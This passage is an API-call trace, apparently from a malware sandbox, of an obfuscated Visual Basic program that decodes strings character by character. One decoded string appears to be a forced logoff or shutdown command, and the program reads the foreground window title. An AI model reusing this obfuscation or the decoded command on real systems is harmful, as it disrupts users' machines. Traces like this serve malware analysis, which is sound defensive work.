Msg=0xd, wParam=0xb, lParam=0x10e1d20) returned 0xa [0180.551] GetFocus () returned 0x0 [0180.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0180.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=11 | out: lpWideCharStr="FolderView") returned 11 [0180.551] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0180.551] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.552] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0180.553] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.553] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0180.554] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.554] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.555] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.555] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0180.556] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.556] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0180.556] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.557] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.558] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.558] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.558] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.559] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.559] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.560] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.560] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.561] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.561] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.562] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.562] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.563] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.563] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.563] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.564] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.564] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.565] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.565] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.566] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.566] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.567] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.567] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.568] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.568] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.569] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.569] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.569] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.618] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.618] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.619] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.619] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.620] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.620] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.621] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.621] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.621] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.622] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.622] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.622] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.623] GetForegroundWindow () returned 0x20086 [0180.623] GetLastError () returned 0x0 [0180.623] SysStringLen (param_1=" ") returned 0xff [0180.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.623] SysStringLen (param_1=" ") returned 0xff [0180.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.623] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.623] GetLastError () returned 0x0 [0180.624] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.624] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.624] SysStringLen (param_1="Progr") returned 0x5 [0180.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Progr", cchWideChar=6, lpMultiByteStr=0x116854c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Progr", lpUsedDefaultChar=0x0) returned 6 [0180.624] SetWindowTextA (hWnd=0x103c4, lpString="Progr") returned 1 [0180.625] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0180.625] GetFocus () returned 0x0 [0180.625] lstrlenA (lpString="Progr") returned 5 [0180.625] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0180.625] IsWindow (hWnd=0x103c4) returned 1 [0180.625] IsWindow (hWnd=0x103c4) returned 1 [0180.626] IsWindow (hWnd=0x103c4) returned 1 [0180.626] IsWindow (hWnd=0x103c4) returned 1 [0180.626] GetFocus () returned 0x0 [0180.627] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0180.627] GetFocus () returned 0x0 [0180.627] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0180.627] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0180.627] GetFocus () returned 0x0 [0180.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0180.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=6 | out: lpWideCharStr="Progr") returned 6 [0180.627] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.627] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0180.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.629] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0180.629] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.630] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0180.630] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.631] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0180.631] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.632] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.632] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.633] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.633] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.634] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 